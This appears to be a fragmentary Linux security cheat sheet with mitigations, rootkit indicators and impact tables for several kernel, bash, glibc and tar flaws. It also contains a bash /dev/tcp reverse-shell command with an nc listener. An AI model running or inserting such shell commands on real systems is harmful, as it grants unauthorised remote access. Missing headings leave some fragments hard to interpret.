cat /sys/devices/system/cpu/vulnerabilities/*
You need to compiled bash with –enable-net-redirections option.
/bin/bash -c '/bin/bash -i > /dev/tcp/127.0.0.1/8181 0<&1 2>&1&' /bin/bash -i >& /dev/tcp/127.0.0.1/8181 0>&1
nc -nlvp 8181
4.0.0+ < 4.7.3
You can disable SMB1 protocol
server min protocol = SMB2
Clients are vulnerable. Access point no, if doesn't use roaming or client mode.
Clients can be disconnected automatically by running this script on AP.
lsmod | grep nf_table
Module name | Size | MD5 |
---|---|---|
nf_table_6_64.ko | 9672 | 2CB8954A3E683477AA5A084964D4665D |
Hidden iptables rule dpxvke8h18
iptables -t dpxvke8h18 -A PREROUTING \ -p tcp -s 1.1.1.1 -d 2.2.2.2 --dport 33 \ -j DNAT --to-destination 4.4.4.4:55
TCP traffic from IP 1.1.1.1 that is bound for IP 2.2.2.2, port 33. The traffic is redirected to IP 4.4.4.4, port 55
Samba 3.5.0+
[global] nt pipe support = no
Logged in user
Impact | Place | Complexity |
---|---|---|
Local escalation | Kernel 2.6.22 - and up to 10/2016 | Very Low |
Remote bash call or local user attack
Impact | Place | Complexity |
---|---|---|
Network escalation | Bash | Medium |
By reverse DNS queries
Impact | Place | Complexity |
---|---|---|
Network escalation | GLIBC / Many linked SW | High |
Malicious TAR file
Impact | Place | Complexity |
---|---|---|
File Overwrite | GNU tar 1.14 – 1.29 | Medium |